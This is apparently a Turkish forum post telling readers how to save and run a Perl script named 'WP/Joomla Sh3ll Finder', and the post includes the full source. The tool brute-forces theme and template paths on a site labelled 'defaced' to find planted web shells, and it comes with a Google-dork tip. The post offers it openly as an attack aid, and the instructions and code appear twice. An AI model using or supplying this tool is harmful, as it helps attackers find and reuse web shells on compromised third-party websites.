arkadaşlar aşağıdaki kodu not defterini yapıştırın sorna uzantısı scanner.pl olcak şekilde kaydedin gerekli klasöre atın ...pc nizde active perl yüklü olmadılıdr yoksa indirin kurun sonra c/perl/bin klasörüne atın sonra balşat çalıştır cmd yazıp enterleyin gelen konsola şunları yapın
cd..
cd..
cd perl
cd bin
perl scanner.pl yazıp enterleyin
kaşınıza gelcek
#
use HTTP::Request;
use LWP::UserAgent;
START:
system('cls');
system('color a');
system('title WP/Joomla Sh3ll Finder V2.0 (By X-c0d3r)');
print "\n";
print "\tSelect the type of cms the site uses:\n";
print "\t ___________________________________________\n";
print "\t|| 1 = Wordpress ||\n";
print "\t|| 2 = Joomla! ||\n";
print "\t|| 3 = View Usage (Must Read) ||\n";
print "\t||__________________________________________||\n";
print "\tEnter your choice 1/2 -> ";
$cms=<STDIN>;
chomp $cms;
if ($cms eq '1')
{
ret1:
print "\n\tPlease Enter Site\n \tExample: www.defaced-wp-site.com\n\t-> ";
$site=<STDIN>;
chomp $site;
if ( $site !~ /^http:/ )
{
$site = 'http://'. $site;
}
if ( $site !~ /\/$/ ) {
$site = $site . '/';
}
if ($site =~ m/([a-z0-9-].*)[.{2}](([a-z]{4}|[a-z]{3}|[a-z]{2}))/) {
goto temp1;
} else
{
print "\n\tPlease cooperate & use this script by entering a proper site! -_-";
goto ret1;
}
temp1:
print "\n";
print "\n\tPlease Enter the Theme dir used by site: example: twentyeleven,twentyten....\n\t->";
$theme=<STDIN>;
$dir="wp-content/themes/";
chomp $theme;
$name="$site$dir$theme/$dirs";print "\t-> Defaced Site: $site\n";print "\t-> Starting Bruteforcing process....\n";
open IN, "< wpfinal.txt" or die "\tFile wpfinal.txt not found please create and put ur brute forcing list!";
push(@brute_terms,<IN>);
my $num = @brute_terms;print ("\t-> Having $num paths for guessing.\n");
foreach $dirs(@brute_terms)
{
$name="$site$dir$theme/$dirs";
my $req=HTTP::Request->new(GET=>$name);
my $ua=LWP::UserAgent->new();
$ua->timeout(60);
my $response=$ua->request($req);
if($response->content =~ /Uname:/ || $response->content =~ /Symlink/ || $response->content =~/server ip :/ || $response->content =~ /<form method=post>/ || /<input type=password/)
{
print " \n\t >.Found Sh3ll -> $name\n";
system('pause');
}
else {
print "\n\tNot found -> ".$name;
}
}
}
if ($cms eq '2')
{
ret:print "\n\tPlease Enter Site\n\t Example: www.defaced-joomla-site.com\n\t-> ";
$site=<STDIN>;
chomp $site;
if ( $site !~ /^http:/ )
{
$site = 'http://'.$site;
}
if ( $site !~ /\/$/ )
{
$site = $site.'/';
}
if ($site =~ m/([a-z0-9-].*)[.{2}](([a-z]{4}|[a-z]{3}|[a-z]{2}))/)
{
goto temp;
}
else {
print "\n\tPlease cooperate & use this script by entering a proper site! -_-";
goto ret;
}
temp:print "\n";print "\tPlease Enter the Template dir used by site: example: beez,system...\n\t->";
$theme=<STDIN>;
$dir="templates/";
chomp $theme;
$name="$site$dir$theme/$dirs";print "\t-> Defaced Site: $site\n";print "\t-> Starting Bruteforcing process....";
open IN, "< jofinal.txt" or die "\tFile jofinal.txt not found please create and put ur brute forcing list!";
push(@brute_terms,<IN>);
my $num = @brute_terms;print ("\t-> Having $num paths for guessing .\n");
foreach $dirs(@brute_terms)
{
$name="$site$dir$theme/$dirs";
my $req=HTTP::Request->new(GET=>$name);
my $ua=LWP::UserAgent->new();
$ua->timeout(60);
my $response=$ua->request($req);
if($response->content =~ /Uname:/ || $response->content =~ /Symlink/ || $response->content =~/server ip :/ || $response->content =~ /<form method=post>/ || /<input type=password/)
{
print "\n\t >.Found Sh3ll -> $name\n";
system ('pause');
}
else { print "\n\tNot found -> $name ";
}
}
}
if ($cms eq 3){ &usage }
sub usage()
{print ("\n\t-->To find theme/template dir used by the site use google dork cache:site.com then -> view source\n\n");
system("pause");
system("cls");print ("\n");
goto START;
}
if ($cms != 1 && 2 && 3){ goto START; }
#EOF
cd..
cd..
cd perl
cd bin
perl scanner.pl yazıp enterleyin
kaşınıza gelcek
#
use HTTP::Request;
use LWP::UserAgent;
START:
system('cls');
system('color a');
system('title WP/Joomla Sh3ll Finder V2.0 (By X-c0d3r)');
print "\n";
print "\tSelect the type of cms the site uses:\n";
print "\t ___________________________________________\n";
print "\t|| 1 = Wordpress ||\n";
print "\t|| 2 = Joomla! ||\n";
print "\t|| 3 = View Usage (Must Read) ||\n";
print "\t||__________________________________________||\n";
print "\tEnter your choice 1/2 -> ";
$cms=<STDIN>;
chomp $cms;
if ($cms eq '1')
{
ret1:
print "\n\tPlease Enter Site\n \tExample: www.defaced-wp-site.com\n\t-> ";
$site=<STDIN>;
chomp $site;
if ( $site !~ /^http:/ )
{
$site = 'http://'. $site;
}
if ( $site !~ /\/$/ ) {
$site = $site . '/';
}
if ($site =~ m/([a-z0-9-].*)[.{2}](([a-z]{4}|[a-z]{3}|[a-z]{2}))/) {
goto temp1;
} else
{
print "\n\tPlease cooperate & use this script by entering a proper site! -_-";
goto ret1;
}
temp1:
print "\n";
print "\n\tPlease Enter the Theme dir used by site: example: twentyeleven,twentyten....\n\t->";
$theme=<STDIN>;
$dir="wp-content/themes/";
chomp $theme;
$name="$site$dir$theme/$dirs";print "\t-> Defaced Site: $site\n";print "\t-> Starting Bruteforcing process....\n";
open IN, "< wpfinal.txt" or die "\tFile wpfinal.txt not found please create and put ur brute forcing list!";
push(@brute_terms,<IN>);
my $num = @brute_terms;print ("\t-> Having $num paths for guessing.\n");
foreach $dirs(@brute_terms)
{
$name="$site$dir$theme/$dirs";
my $req=HTTP::Request->new(GET=>$name);
my $ua=LWP::UserAgent->new();
$ua->timeout(60);
my $response=$ua->request($req);
if($response->content =~ /Uname:/ || $response->content =~ /Symlink/ || $response->content =~/server ip :/ || $response->content =~ /<form method=post>/ || /<input type=password/)
{
print " \n\t >.Found Sh3ll -> $name\n";
system('pause');
}
else {
print "\n\tNot found -> ".$name;
}
}
}
if ($cms eq '2')
{
ret:print "\n\tPlease Enter Site\n\t Example: www.defaced-joomla-site.com\n\t-> ";
$site=<STDIN>;
chomp $site;
if ( $site !~ /^http:/ )
{
$site = 'http://'.$site;
}
if ( $site !~ /\/$/ )
{
$site = $site.'/';
}
if ($site =~ m/([a-z0-9-].*)[.{2}](([a-z]{4}|[a-z]{3}|[a-z]{2}))/)
{
goto temp;
}
else {
print "\n\tPlease cooperate & use this script by entering a proper site! -_-";
goto ret;
}
temp:print "\n";print "\tPlease Enter the Template dir used by site: example: beez,system...\n\t->";
$theme=<STDIN>;
$dir="templates/";
chomp $theme;
$name="$site$dir$theme/$dirs";print "\t-> Defaced Site: $site\n";print "\t-> Starting Bruteforcing process....";
open IN, "< jofinal.txt" or die "\tFile jofinal.txt not found please create and put ur brute forcing list!";
push(@brute_terms,<IN>);
my $num = @brute_terms;print ("\t-> Having $num paths for guessing .\n");
foreach $dirs(@brute_terms)
{
$name="$site$dir$theme/$dirs";
my $req=HTTP::Request->new(GET=>$name);
my $ua=LWP::UserAgent->new();
$ua->timeout(60);
my $response=$ua->request($req);
if($response->content =~ /Uname:/ || $response->content =~ /Symlink/ || $response->content =~/server ip :/ || $response->content =~ /<form method=post>/ || /<input type=password/)
{
print "\n\t >.Found Sh3ll -> $name\n";
system ('pause');
}
else { print "\n\tNot found -> $name ";
}
}
}
if ($cms eq 3){ &usage }
sub usage()
{print ("\n\t-->To find theme/template dir used by the site use google dork cache:site.com then -> view source\n\n");
system("pause");
system("cls");print ("\n");
goto START;
}
if ($cms != 1 && 2 && 3){ goto START; }
#EOF
Teşekkürler...